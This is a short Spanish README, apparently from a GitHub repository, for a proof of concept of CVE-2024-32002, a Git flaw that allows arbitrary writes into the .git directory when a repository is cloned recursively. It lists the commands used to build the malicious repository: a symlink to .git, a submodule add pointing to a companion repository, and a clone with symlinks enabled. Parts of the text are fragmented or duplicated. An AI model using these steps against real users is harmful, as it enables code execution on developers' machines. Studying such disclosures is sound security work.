
Un PoC para CVE-2024-32002 que demuestra escritura arbitraria en el directorio .git.
Un POC para CVE-2024-32002 que demuestra escritura arbitraria en el directorio .git.
Vea cve-2024-32002-submodule-aw para el repositorio de submódulo relacionado.
.git..gitmodules que define el submódulo malicioso.Este repositorio fue creado en Linux (WSL2, para ser específico). Esto es importante, el repositorio malicioso solo puede crearse en un sistema de archivos sensible a mayúsculas y minúsculas.
ln -s .git submodule
Notas:
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists
Notas:
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git